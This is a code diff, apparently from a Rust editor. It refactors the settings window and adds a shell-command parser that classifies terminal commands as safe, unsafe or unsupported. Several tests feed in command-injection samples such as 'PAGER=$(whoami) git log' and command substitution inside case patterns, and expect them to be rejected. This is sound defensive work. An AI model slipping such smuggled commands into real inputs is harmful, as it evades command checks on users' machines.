- open_settings_editor(workspace, Some(&path), None, window_handle, cx);
- },
- )
- .register_action(|workspace, _: &OpenSettings, window, cx| {
- let window_handle = window
- .window_handle()
- .downcast::<MultiWorkspace>()
- .expect("Workspaces are root Windows");
- open_settings_editor(workspace, None, None, window_handle, cx);
+ .register_action(|_, OpenSettingsAt { path }: &OpenSettingsAt, window, cx| {
+ let window_handle = window.window_handle().downcast::<MultiWorkspace>();
+ open_settings_editor(Some(&path), None, window_handle, cx);
+ })
+ .register_action(|_, _: &OpenSettings, window, cx| {
+ let window_handle = window.window_handle().downcast::<MultiWorkspace>();
+ open_settings_editor(None, None, window_handle, cx);
})
.register_action(|workspace, _: &OpenProjectSettings, window, cx| {
- let window_handle = window
- .window_handle()
- .downcast::<MultiWorkspace>()
- .expect("Workspaces are root Windows");
+ let window_handle = window.window_handle().downcast::<MultiWorkspace>();
let target_worktree_id = workspace
.project()
.read(cx)
@@ -425,7 +418,7 @@ pub fn init(cx: &mut App) {
.is_dir()
.then_some(tree.read(cx).id())
});
- open_settings_editor(workspace, None, target_worktree_id, window_handle, cx);
+ open_settings_editor(None, target_worktree_id, window_handle, cx);
});
})
.detach();
@@ -530,7 +523,7 @@ fn init_renderers(cx: &mut App) {
.add_basic_renderer::<settings::VimInsertModeCursorShape>(render_dropdown)
.add_basic_renderer::<settings::SteppingGranularity>(render_dropdown)
.add_basic_renderer::<settings::NotifyWhenAgentWaiting>(render_dropdown)
- .add_basic_renderer::<settings::NotifyWhenAgentWaiting>(render_dropdown)
+ .add_basic_renderer::<settings::NewThreadLocation>(render_dropdown)
.add_basic_renderer::<settings::ImageFileSizeUnit>(render_dropdown)
.add_basic_renderer::<settings::StatusStyle>(render_dropdown)
.add_basic_renderer::<settings::EncodingDisplayOptions>(render_dropdown)
@@ -552,6 +545,7 @@ fn init_renderers(cx: &mut App) {
.add_basic_renderer::<settings::EditPredictionsMode>(render_dropdown)
.add_basic_renderer::<settings::RelativeLineNumbers>(render_dropdown)
.add_basic_renderer::<settings::WindowDecorations>(render_dropdown)
+ .add_basic_renderer::<settings::WindowButtonLayoutContentDiscriminants>(render_dropdown)
.add_basic_renderer::<settings::FontSize>(render_editable_number_field)
.add_basic_renderer::<settings::OllamaModelName>(render_ollama_model_picker)
.add_basic_renderer::<settings::SemanticTokens>(render_dropdown)
@@ -564,10 +558,9 @@ fn init_renderers(cx: &mut App) {
}
pub fn open_settings_editor(
- _workspace: &mut Workspace,
path: Option<&str>,
target_worktree_id: Option<WorktreeId>,
- workspace_handle: WindowHandle<MultiWorkspace>,
+ workspace_handle: Option<WindowHandle<MultiWorkspace>>,
cx: &mut App,
) {
telemetry::event!("Settings Viewed");
@@ -624,7 +617,8 @@ pub fn open_settings_editor(
if let Some(existing_window) = existing_window {
existing_window
.update(cx, |settings_window, window, cx| {
- settings_window.original_window = Some(workspace_handle);
+ settings_window.original_window = workspace_handle;
+
window.activate_window();
if let Some(path) = path {
open_path(path, settings_window, window, cx);
@@ -685,7 +679,7 @@ pub fn open_settings_editor(
},
|window, cx| {
let settings_window =
- cx.new(|cx| SettingsWindow::new(Some(workspace_handle), window, cx));
+ cx.new(|cx| SettingsWindow::new(workspace_handle, window, cx));
settings_window.update(cx, |settings_window, cx| {
if let Some(path) = path {
open_path(&path, settings_window, window, cx);
@@ -925,9 +919,7 @@ impl SettingsPageItem {
Button::new("error-warning", warning)
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(Some(IconName::Debug))
- .icon_position(IconPosition::Start)
- .icon_color(Color::Error)
+ .start_icon(Icon::new(IconName::Debug).color(Color::Error))
.tab_index(0_isize)
.tooltip(Tooltip::text(setting_item.field.type_name()))
.into_any_element(),
@@ -992,11 +984,12 @@ impl SettingsPageItem {
("sub-page".into(), sub_page_link.title.clone()),
"Configure",
)
- .icon(IconName::ChevronRight)
.tab_index(0_isize)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ChevronRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.style(ButtonStyle::OutlinedGhost)
.size(ButtonSize::Medium)
.on_click({
@@ -1125,11 +1118,12 @@ impl SettingsPageItem {
("action-link".into(), action_link.title.clone()),
action_link.button_text.clone(),
)
- .icon(IconName::ArrowUpRight)
.tab_index(0_isize)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.style(ButtonStyle::OutlinedGhost)
.size(ButtonSize::Medium)
.on_click({
@@ -2191,37 +2185,39 @@ impl SettingsWindow {
ui_files.reverse();
- let mut missing_worktrees = Vec::new();
+ if self.original_window.is_some() {
+ let mut missing_worktrees = Vec::new();
- for worktree in all_projects(self.original_window.as_ref(), cx)
- .flat_map(|project| project.read(cx).visible_worktrees(cx))
- .filter(|tree| !self.worktree_root_dirs.contains_key(&tree.read(cx).id()))
- {
- let worktree = worktree.read(cx);
- let worktree_id = worktree.id();
- let Some(directory_name) = worktree.root_dir().and_then(|file| {
- file.file_name()
- .map(|os_string| os_string.to_string_lossy().to_string())
- }) else {
- continue;
- };
+ for worktree in all_projects(self.original_window.as_ref(), cx)
+ .flat_map(|project| project.read(cx).visible_worktrees(cx))
+ .filter(|tree| !self.worktree_root_dirs.contains_key(&tree.read(cx).id()))
+ {
+ let worktree = worktree.read(cx);
+ let worktree_id = worktree.id();
+ let Some(directory_name) = worktree.root_dir().and_then(|file| {
+ file.file_name()
+ .map(|os_string| os_string.to_string_lossy().to_string())
+ }) else {
+ continue;
+ };
- missing_worktrees.push((worktree_id, directory_name.clone()));
- let path = RelPath::empty().to_owned().into_arc();
+ missing_worktrees.push((worktree_id, directory_name.clone()));
+ let path = RelPath::empty().to_owned().into_arc();
- let settings_ui_file = SettingsUiFile::Project((worktree_id, path));
+ let settings_ui_file = SettingsUiFile::Project((worktree_id, path));
- let focus_handle = prev_files
- .iter()
- .find_map(|(prev_file, handle)| {
- (prev_file == &settings_ui_file).then(|| handle.clone())
- })
- .unwrap_or_else(|| cx.focus_handle().tab_index(0).tab_stop(true));
+ let focus_handle = prev_files
+ .iter()
+ .find_map(|(prev_file, handle)| {
+ (prev_file == &settings_ui_file).then(|| handle.clone())
+ })
+ .unwrap_or_else(|| cx.focus_handle().tab_index(0).tab_stop(true));
- ui_files.push((settings_ui_file, focus_handle));
- }
+ ui_files.push((settings_ui_file, focus_handle));
+ }
- self.worktree_root_dirs.extend(missing_worktrees);
+ self.worktree_root_dirs.extend(missing_worktrees);
+ }
self.files = ui_files;
let current_file_still_exists = self
@@ -2883,7 +2879,7 @@ impl SettingsWindow {
}
fn render_sub_page_breadcrumbs(&self) -> impl IntoElement {
- h_flex().gap_1().children(
+ h_flex().min_w_0().gap_1().overflow_x_hidden().children(
itertools::intersperse(
std::iter::once(self.current_page().title.into()).chain(
self.sub_page_stack
@@ -3113,9 +3109,11 @@ impl SettingsWindow {
if let Some(current_sub_page) = self.sub_page_stack.last() {
page_header = h_flex()
.w_full()
+ .min_w_0()
.justify_between()
.child(
h_flex()
+ .min_w_0()
.ml_neg_1p5()
.gap_1()
.child(
@@ -3130,17 +3128,19 @@ impl SettingsWindow {
)
.when(current_sub_page.link.in_json, |this| {
this.child(
- Button::new("open-in-settings-file", "Edit in settings.json")
- .tab_index(0_isize)
- .style(ButtonStyle::OutlinedGhost)
- .tooltip(Tooltip::for_action_title_in(
- "Edit in settings.json",
- &OpenCurrentFile,
- &self.focus_handle,
- ))
- .on_click(cx.listener(|this, _, window, cx| {
- this.open_current_settings_file(window, cx);
- })),
+ div().flex_shrink_0().child(
+ Button::new("open-in-settings-file", "Edit in settings.json")
+ .tab_index(0_isize)
+ .style(ButtonStyle::OutlinedGhost)
+ .tooltip(Tooltip::for_action_title_in(
+ "Edit in settings.json",
+ &OpenCurrentFile,
+ &self.focus_handle,
+ ))
+ .on_click(cx.listener(|this, _, window, cx| {
+ this.open_current_settings_file(window, cx);
+ })),
+ ),
)
})
.into_any_element();
@@ -3310,6 +3310,7 @@ impl SettingsWindow {
.pt_6()
.gap_4()
.flex_1()
+ .min_w_0()
.bg(cx.theme().colors().editor_background)
.child(
v_flex()
@@ -4174,10 +4175,11 @@ fn render_picker_trigger_button(id: SharedString, label: SharedString) -> Button
.tab_index(0_isize)
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::ChevronUpDown)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::End)
+ .end_icon(
+ Icon::new(IconName::ChevronUpDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
}
fn render_font_picker(
@@ -1,8 +1,25 @@
use brush_parser::ast;
+use brush_parser::ast::SourceLocation;
use brush_parser::word::WordPiece;
use brush_parser::{Parser, ParserOptions, SourceInfo};
use std::io::BufReader;
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct TerminalCommandPrefix {
+ pub normalized: String,
+ pub display: String,
+ pub tokens: Vec<String>,
+ pub command: String,
+ pub subcommand: Option<String>,
+}
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum TerminalCommandValidation {
+ Safe,
+ Unsafe,
+ Unsupported,
+}
+
pub fn extract_commands(command: &str) -> Option<Vec<String>> {
let reader = BufReader::new(command.as_bytes());
let options = ParserOptions::default();
@@ -17,6 +34,444 @@ pub fn extract_commands(command: &str) -> Option<Vec<String>> {
Some(commands)
}
+pub fn extract_terminal_command_prefix(command: &str) -> Option<TerminalCommandPrefix> {
+ let reader = BufReader::new(command.as_bytes());
+ let options = ParserOptions::default();
+ let source_info = SourceInfo::default();
+ let mut parser = Parser::new(reader, &options, &source_info);
+
+ let program = parser.parse_program().ok()?;
+ let simple_command = first_simple_command(&program)?;
+
+ let mut normalized_tokens = Vec::new();
+ let mut display_start = None;
+ let mut display_end = None;
+
+ if let Some(prefix) = &simple_command.prefix {
+ for item in &prefix.0 {
+ if let ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) = item {
+ match normalize_assignment_for_command_prefix(assignment, word)? {
+ NormalizedAssignment::Included(normalized_assignment) => {
+ normalized_tokens.push(normalized_assignment);
+ update_display_bounds(&mut display_start, &mut display_end, word);
+ }
+ NormalizedAssignment::Skipped => {}
+ }
+ }
+ }
+ }
+
+ let command_word = simple_command.word_or_name.as_ref()?;
+ let command_name = normalize_word(command_word)?;
+ normalized_tokens.push(command_name.clone());
+ update_display_bounds(&mut display_start, &mut display_end, command_word);
+
+ let mut subcommand = None;
+ if let Some(suffix) = &simple_command.suffix {
+ for item in &suffix.0 {
+ match item {
+ ast::CommandPrefixOrSuffixItem::IoRedirect(_) => continue,
+ ast::CommandPrefixOrSuffixItem::Word(word) => {
+ let normalized_word = normalize_word(word)?;
+ if !normalized_word.starts_with('-') {
+ subcommand = Some(normalized_word.clone());
+ normalized_tokens.push(normalized_word);
+ update_display_bounds(&mut display_start, &mut display_end, word);
+ }
+ break;
+ }
+ _ => break,
+ }
+ }
+ }
+
+ let start = display_start?;
+ let end = display_end?;
+ let display = command.get(start..end)?.to_string();
+
+ Some(TerminalCommandPrefix {
+ normalized: normalized_tokens.join(" "),
+ display,
+ tokens: normalized_tokens,
+ command: command_name,
+ subcommand,
+ })
+}
+
+pub fn validate_terminal_command(command: &str) -> TerminalCommandValidation {
+ let reader = BufReader::new(command.as_bytes());
+ let options = ParserOptions::default();
+ let source_info = SourceInfo::default();
+ let mut parser = Parser::new(reader, &options, &source_info);
+
+ let program = match parser.parse_program() {
+ Ok(program) => program,
+ Err(_) => return TerminalCommandValidation::Unsupported,
+ };
+
+ match program_validation(&program) {
+ TerminalProgramValidation::Safe => TerminalCommandValidation::Safe,
+ TerminalProgramValidation::Unsafe => TerminalCommandValidation::Unsafe,
+ TerminalProgramValidation::Unsupported => TerminalCommandValidation::Unsupported,
+ }
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum TerminalProgramValidation {
+ Safe,
+ Unsafe,
+ Unsupported,
+}
+
+fn first_simple_command(program: &ast::Program) -> Option<&ast::SimpleCommand> {
+ let complete_command = program.complete_commands.first()?;
+ let compound_list_item = complete_command.0.first()?;
+ let command = compound_list_item.0.first.seq.first()?;
+
+ match command {
+ ast::Command::Simple(simple_command) => Some(simple_command),
+ _ => None,
+ }
+}
+
+fn update_display_bounds(start: &mut Option<usize>, end: &mut Option<usize>, word: &ast::Word) {
+ if let Some(location) = word.location() {
+ let word_start = location.start.index;
+ let word_end = location.end.index;
+ *start = Some(start.map_or(word_start, |current| current.min(word_start)));
+ *end = Some(end.map_or(word_end, |current| current.max(word_end)));
+ }
+}
+
+enum NormalizedAssignment {
+ Included(String),
+ Skipped,
+}
+
+fn normalize_assignment_for_command_prefix(
+ assignment: &ast::Assignment,
+ word: &ast::Word,
+) -> Option<NormalizedAssignment> {
+ let operator = if assignment.append { "+=" } else { "=" };
+ let assignment_prefix = format!("{}{}", assignment.name, operator);
+
+ match &assignment.value {
+ ast::AssignmentValue::Scalar(value) => {
+ let normalized_value = normalize_word(value)?;
+ let raw_value = word.value.strip_prefix(&assignment_prefix)?;
+ let rendered_value = if shell_value_requires_quoting(&normalized_value) {
+ raw_value.to_string()
+ } else {
+ normalized_value
+ };
+
+ Some(NormalizedAssignment::Included(format!(
+ "{assignment_prefix}{rendered_value}"
+ )))
+ }
+ ast::AssignmentValue::Array(_) => Some(NormalizedAssignment::Skipped),
+ }
+}
+
+fn shell_value_requires_quoting(value: &str) -> bool {
+ value.chars().any(|character| {
+ character.is_whitespace()
+ || !matches!(
+ character,
+ 'a'..='z'
+ | 'A'..='Z'
+ | '0'..='9'
+ | '_'
+ | '@'
+ | '%'
+ | '+'
+ | '='
+ | ':'
+ | ','
+ | '.'
+ | '/'
+ | '-'
+ )
+ })
+}
+
+fn program_validation(program: &ast::Program) -> TerminalProgramValidation {
+ combine_validations(
+ program
+ .complete_commands
+ .iter()
+ .map(compound_list_validation),
+ )
+}
+
+fn compound_list_validation(compound_list: &ast::CompoundList) -> TerminalProgramValidation {
+ combine_validations(
+ compound_list
+ .0
+ .iter()
+ .map(|item| and_or_list_validation(&item.0)),
+ )
+}
+
+fn and_or_list_validation(and_or_list: &ast::AndOrList) -> TerminalProgramValidation {
+ combine_validations(
+ std::iter::once(pipeline_validation(&and_or_list.first)).chain(
+ and_or_list.additional.iter().map(|and_or| match and_or {
+ ast::AndOr::And(pipeline) | ast::AndOr::Or(pipeline) => {
+ pipeline_validation(pipeline)
+ }
+ }),
+ ),
+ )
+}
+
+fn pipeline_validation(pipeline: &ast::Pipeline) -> TerminalProgramValidation {
+ combine_validations(pipeline.seq.iter().map(command_validation))
+}
+
+fn command_validation(command: &ast::Command) -> TerminalProgramValidation {
+ match command {
+ ast::Command::Simple(simple_command) => simple_command_validation(simple_command),
+ ast::Command::Compound(compound_command, redirect_list) => combine_validations(
+ std::iter::once(compound_command_validation(compound_command))
+ .chain(redirect_list.iter().map(redirect_list_validation)),
+ ),
+ ast::Command::Function(function_definition) => {
+ function_body_validation(&function_definition.body)
+ }
+ ast::Command::ExtendedTest(test_expr) => extended_test_expr_validation(test_expr),
+ }
+}
+
+fn simple_command_validation(simple_command: &ast::SimpleCommand) -> TerminalProgramValidation {
+ combine_validations(
+ simple_command
+ .prefix
+ .iter()
+ .map(command_prefix_validation)
+ .chain(simple_command.word_or_name.iter().map(word_validation))
+ .chain(simple_command.suffix.iter().map(command_suffix_validation)),
+ )
+}
+
+fn command_prefix_validation(prefix: &ast::CommandPrefix) -> TerminalProgramValidation {
+ combine_validations(prefix.0.iter().map(prefix_or_suffix_item_validation))
+}
+
+fn command_suffix_validation(suffix: &ast::CommandSuffix) -> TerminalProgramValidation {
+ combine_validations(suffix.0.iter().map(prefix_or_suffix_item_validation))
+}
+
+fn prefix_or_suffix_item_validation(
+ item: &ast::CommandPrefixOrSuffixItem,
+) -> TerminalProgramValidation {
+ match item {
+ ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => io_redirect_validation(redirect),
+ ast::CommandPrefixOrSuffixItem::Word(word) => word_validation(word),
+ ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => {
+ combine_validations([assignment_validation(assignment), word_validation(word)])
+ }
+ ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => {
+ TerminalProgramValidation::Unsafe
+ }
+ }
+}
+
+fn io_redirect_validation(redirect: &ast::IoRedirect) -> TerminalProgramValidation {
+ match redirect {
+ ast::IoRedirect::File(_, _, target) => match target {
+ ast::IoFileRedirectTarget::Filename(word) => word_validation(word),
+ ast::IoFileRedirectTarget::ProcessSubstitution(_, _) => {
+ TerminalProgramValidation::Unsafe
+ }
+ _ => TerminalProgramValidation::Safe,
+ },
+ ast::IoRedirect::HereDocument(_, here_doc) => {
+ if here_doc.requires_expansion {
+ word_validation(&here_doc.doc)
+ } else {
+ TerminalProgramValidation::Safe
+ }
+ }
+ ast::IoRedirect::HereString(_, word) | ast::IoRedirect::OutputAndError(word, _) => {
+ word_validation(word)
+ }
+ }
+}
+
+fn assignment_validation(assignment: &ast::Assignment) -> TerminalProgramValidation {
+ match &assignment.value {
+ ast::AssignmentValue::Scalar(word) => word_validation(word),
+ ast::AssignmentValue::Array(words) => {
+ combine_validations(words.iter().flat_map(|(key, value)| {
+ key.iter()
+ .map(word_validation)
+ .chain(std::iter::once(word_validation(value)))
+ }))
+ }
+ }
+}
+
+fn word_validation(word: &ast::Word) -> TerminalProgramValidation {
+ let options = ParserOptions::default();
+ let pieces = match brush_parser::word::parse(&word.value, &options) {
+ Ok(pieces) => pieces,
+ Err(_) => return TerminalProgramValidation::Unsupported,
+ };
+
+ combine_validations(
+ pieces
+ .iter()
+ .map(|piece_with_source| word_piece_validation(&piece_with_source.piece)),
+ )
+}
+
+fn word_piece_validation(piece: &WordPiece) -> TerminalProgramValidation {
+ match piece {
+ WordPiece::Text(_)
+ | WordPiece::SingleQuotedText(_)
+ | WordPiece::AnsiCQuotedText(_)
+ | WordPiece::EscapeSequence(_)
+ | WordPiece::TildePrefix(_) => TerminalProgramValidation::Safe,
+ WordPiece::DoubleQuotedSequence(pieces)
+ | WordPiece::GettextDoubleQuotedSequence(pieces) => combine_validations(
+ pieces
+ .iter()
+ .map(|inner| word_piece_validation(&inner.piece)),
+ ),
+ WordPiece::ParameterExpansion(_) | WordPiece::ArithmeticExpression(_) => {
+ TerminalProgramValidation::Unsafe
+ }
+ WordPiece::CommandSubstitution(command)
+ | WordPiece::BackquotedCommandSubstitution(command) => {
+ let reader = BufReader::new(command.as_bytes());
+ let options = ParserOptions::default();
+ let source_info = SourceInfo::default();
+ let mut parser = Parser::new(reader, &options, &source_info);
+
+ match parser.parse_program() {
+ Ok(_) => TerminalProgramValidation::Unsafe,
+ Err(_) => TerminalProgramValidation::Unsupported,
+ }
+ }
+ }
+}
+
+fn compound_command_validation(
+ compound_command: &ast::CompoundCommand,
+) -> TerminalProgramValidation {
+ match compound_command {
+ ast::CompoundCommand::BraceGroup(brace_group) => {
+ compound_list_validation(&brace_group.list)
+ }
+ ast::CompoundCommand::Subshell(subshell) => compound_list_validation(&subshell.list),
+ ast::CompoundCommand::ForClause(for_clause) => combine_validations(
+ for_clause
+ .values
+ .iter()
+ .flat_map(|values| values.iter().map(word_validation))
+ .chain(std::iter::once(do_group_validation(&for_clause.body))),
+ ),
+ ast::CompoundCommand::CaseClause(case_clause) => combine_validations(
+ std::iter::once(word_validation(&case_clause.value))
+ .chain(
+ case_clause
+ .cases
+ .iter()
+ .flat_map(|item| item.cmd.iter().map(compound_list_validation)),
+ )
+ .chain(
+ case_clause
+ .cases
+ .iter()
+ .flat_map(|item| item.patterns.iter().map(word_validation)),
+ ),
+ ),
+ ast::CompoundCommand::IfClause(if_clause) => combine_validations(
+ std::iter::once(compound_list_validation(&if_clause.condition))
+ .chain(std::iter::once(compound_list_validation(&if_clause.then)))
+ .chain(if_clause.elses.iter().flat_map(|elses| {
+ elses.iter().flat_map(|else_item| {
+ else_item
+ .condition
+ .iter()
+ .map(compound_list_validation)
+ .chain(std::iter::once(compound_list_validation(&else_item.body)))
+ })
+ })),
+ ),
+ ast::CompoundCommand::WhileClause(while_clause)
+ | ast::CompoundCommand::UntilClause(while_clause) => combine_validations([
+ compound_list_validation(&while_clause.0),
+ do_group_validation(&while_clause.1),
+ ]),
+ ast::CompoundCommand::ArithmeticForClause(_) => TerminalProgramValidation::Unsafe,
+ ast::CompoundCommand::Arithmetic(_) => TerminalProgramValidation::Unsafe,
+ }
+}
+
+fn do_group_validation(do_group: &ast::DoGroupCommand) -> TerminalProgramValidation {
+ compound_list_validation(&do_group.list)
+}
+
+fn function_body_validation(function_body: &ast::FunctionBody) -> TerminalProgramValidation {
+ combine_validations(
+ std::iter::once(compound_command_validation(&function_body.0))
+ .chain(function_body.1.iter().map(redirect_list_validation)),
+ )
+}
+
+fn redirect_list_validation(redirect_list: &ast::RedirectList) -> TerminalProgramValidation {
+ combine_validations(redirect_list.0.iter().map(io_redirect_validation))
+}
+
+fn extended_test_expr_validation(
+ test_expr: &ast::ExtendedTestExprCommand,
+) -> TerminalProgramValidation {
+ extended_test_expr_inner_validation(&test_expr.expr)
+}
+
+fn extended_test_expr_inner_validation(expr: &ast::ExtendedTestExpr) -> TerminalProgramValidation {
+ match expr {
+ ast::ExtendedTestExpr::Not(inner) | ast::ExtendedTestExpr::Parenthesized(inner) => {
+ extended_test_expr_inner_validation(inner)
+ }
+ ast::ExtendedTestExpr::And(left, right) | ast::ExtendedTestExpr::Or(left, right) => {
+ combine_validations([
+ extended_test_expr_inner_validation(left),
+ extended_test_expr_inner_validation(right),
+ ])
+ }
+ ast::ExtendedTestExpr::UnaryTest(_, word) => word_validation(word),
+ ast::ExtendedTestExpr::BinaryTest(_, left, right) => {
+ combine_validations([word_validation(left), word_validation(right)])
+ }
+ }
+}
+
+fn combine_validations(
+ validations: impl IntoIterator<Item = TerminalProgramValidation>,
+) -> TerminalProgramValidation {
+ let mut saw_unsafe = false;
+ let mut saw_unsupported = false;
+
+ for validation in validations {
+ match validation {
+ TerminalProgramValidation::Unsupported => saw_unsupported = true,
+ TerminalProgramValidation::Unsafe => saw_unsafe = true,
+ TerminalProgramValidation::Safe => {}
+ }
+ }
+
+ if saw_unsafe {
+ TerminalProgramValidation::Unsafe
+ } else if saw_unsupported {
+ TerminalProgramValidation::Unsupported
+ } else {
+ TerminalProgramValidation::Safe
+ }
+}
+
fn extract_commands_from_program(program: &ast::Program, commands: &mut Vec<String>) -> Option<()> {
for complete_command in &program.complete_commands {
extract_commands_from_compound_list(complete_command, commands)?;
@@ -117,12 +572,26 @@ fn extract_commands_from_simple_command(
if let Some(prefix) = &simple_command.prefix {
for item in &prefix.0 {
- if let ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) = item {
- match normalize_io_redirect(redirect) {
- Some(RedirectNormalization::Normalized(s)) => redirects.push(s),
- Some(RedirectNormalization::Skip) => {}
- None => return None,
+ match item {
+ ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => {
+ match normalize_io_redirect(redirect) {
+ Some(RedirectNormalization::Normalized(s)) => redirects.push(s),
+ Some(RedirectNormalization::Skip) => {}
+ None => return None,
+ }
+ }
+ ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => {
+ match normalize_assignment_for_command_prefix(assignment, word)? {
+ NormalizedAssignment::Included(normalized_assignment) => {
+ words.push(normalized_assignment);
+ }
+ NormalizedAssignment::Skipped => {}
+ }
+ }
+ ast::CommandPrefixOrSuffixItem::Word(word) => {
+ words.push(normalize_word(word)?);
}
+ ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => return None,
}
}
}
@@ -142,7 +611,15 @@ fn extract_commands_from_simple_command(
None => return None,
}
}
- _ => {}
+ ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => {
+ match normalize_assignment_for_command_prefix(assignment, word)? {
+ NormalizedAssignment::Included(normalized_assignment) => {
+ words.push(normalized_assignment);
+ }
+ NormalizedAssignment::Skipped => {}
+ }
+ }
+ ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => {}
}
}
}
@@ -1061,4 +1538,220 @@ mod tests {
let commands = extract_commands("cmd > /tmp/out 2>/dev/null").expect("parse failed");
assert_eq!(commands, vec!["cmd", "> /tmp/out"]);
}
+
+ #[test]
+ fn test_scalar_env_var_prefix_included_in_extracted_command() {
+ let commands = extract_commands("PAGER=blah git status").expect("parse failed");
+ assert_eq!(commands, vec!["PAGER=blah git status"]);
+ }
+
+ #[test]
+ fn test_multiple_scalar_assignments_preserved_in_order() {
+ let commands = extract_commands("A=1 B=2 git log").expect("parse failed");
+ assert_eq!(commands, vec!["A=1 B=2 git log"]);
+ }
+
+ #[test]
+ fn test_assignment_quoting_dropped_when_safe() {
+ let commands = extract_commands("PAGER='curl' git log").expect("parse failed");
+ assert_eq!(commands, vec!["PAGER=curl git log"]);
+ }
+
+ #[test]
+ fn test_assignment_quoting_preserved_for_whitespace() {
+ let commands = extract_commands("PAGER='less -R' git log").expect("parse failed");
+ assert_eq!(commands, vec!["PAGER='less -R' git log"]);
+ }
+
+ #[test]
+ fn test_assignment_quoting_preserved_for_semicolon() {
+ let commands = extract_commands("PAGER='a;b' git log").expect("parse failed");
+ assert_eq!(commands, vec!["PAGER='a;b' git log"]);
+ }
+
+ #[test]
+ fn test_array_assignments_ignored_for_prefix_matching_output() {
+ let commands = extract_commands("FOO=(a b) git status").expect("parse failed");
+ assert_eq!(commands, vec!["git status"]);
+ }
+
+ #[test]
+ fn test_extract_terminal_command_prefix_includes_env_var_prefix_and_subcommand() {
+ let prefix = extract_terminal_command_prefix("PAGER=blah git log --oneline")
+ .expect("expected terminal command prefix");
+
+ assert_eq!(
+ prefix,
+ TerminalCommandPrefix {
+ normalized: "PAGER=blah git log".to_string(),
+ display: "PAGER=blah git log".to_string(),
+ tokens: vec![
+ "PAGER=blah".to_string(),
+ "git".to_string(),
+ "log".to_string(),
+ ],
+ command: "git".to_string(),
+ subcommand: Some("log".to_string()),
+ }
+ );
+ }
+
+ #[test]
+ fn test_extract_terminal_command_prefix_preserves_required_assignment_quotes_in_display_and_normalized()
+ {
+ let prefix = extract_terminal_command_prefix("PAGER='less -R' git log")
+ .expect("expected terminal command prefix");
+
+ assert_eq!(
+ prefix,
+ TerminalCommandPrefix {
+ normalized: "PAGER='less -R' git log".to_string(),
+ display: "PAGER='less -R' git log".to_string(),
+ tokens: vec![
+ "PAGER='less -R'".to_string(),
+ "git".to_string(),
+ "log".to_string(),
+ ],
+ command: "git".to_string(),
+ subcommand: Some("log".to_string()),
+ }
+ );
+ }
+
+ #[test]
+ fn test_extract_terminal_command_prefix_skips_redirects_before_subcommand() {
+ let prefix = extract_terminal_command_prefix("git 2>/dev/null log --oneline")
+ .expect("expected terminal command prefix");
+
+ assert_eq!(
+ prefix,
+ TerminalCommandPrefix {
+ normalized: "git log".to_string(),
+ display: "git 2>/dev/null log".to_string(),
+ tokens: vec!["git".to_string(), "log".to_string()],
+ command: "git".to_string(),
+ subcommand: Some("log".to_string()),
+ }
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_parameter_expansion() {
+ assert_eq!(
+ validate_terminal_command("echo $HOME"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_braced_parameter_expansion() {
+ assert_eq!(
+ validate_terminal_command("echo ${HOME}"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_special_parameters() {
+ assert_eq!(
+ validate_terminal_command("echo $?"),
+ TerminalCommandValidation::Unsafe
+ );
+ assert_eq!(
+ validate_terminal_command("echo $$"),
+ TerminalCommandValidation::Unsafe
+ );
+ assert_eq!(
+ validate_terminal_command("echo $@"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_command_substitution() {
+ assert_eq!(
+ validate_terminal_command("echo $(whoami)"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_backticks() {
+ assert_eq!(
+ validate_terminal_command("echo `whoami`"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_arithmetic_expansion() {
+ assert_eq!(
+ validate_terminal_command("echo $((1 + 1))"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_process_substitution() {
+ assert_eq!(
+ validate_terminal_command("cat <(ls)"),
+ TerminalCommandValidation::Unsafe
+ );
+ assert_eq!(
+ validate_terminal_command("ls >(cat)"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_forbidden_constructs_in_env_var_assignments() {
+ assert_eq!(
+ validate_terminal_command("PAGER=$HOME git log"),
+ TerminalCommandValidation::Unsafe
+ );
+ assert_eq!(
+ validate_terminal_command("PAGER=$(whoami) git log"),
+ TerminalCommandValidation::Unsafe
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_returns_unsupported_for_parse_failure() {
+ assert_eq!(
+ validate_terminal_command("echo $(ls &&)"),
+ TerminalCommandValidation::Unsupported
+ );
+ }
+
+ #[test]
+ fn test_validate_terminal_command_rejects_substitution_in_case_pattern() {
+ assert_ne!(
+ validate_terminal_command("case x in $(echo y)) echo z;; esac"),
+ TerminalCommandValidation::Safe
+ );
+ }
+
+ #[test]
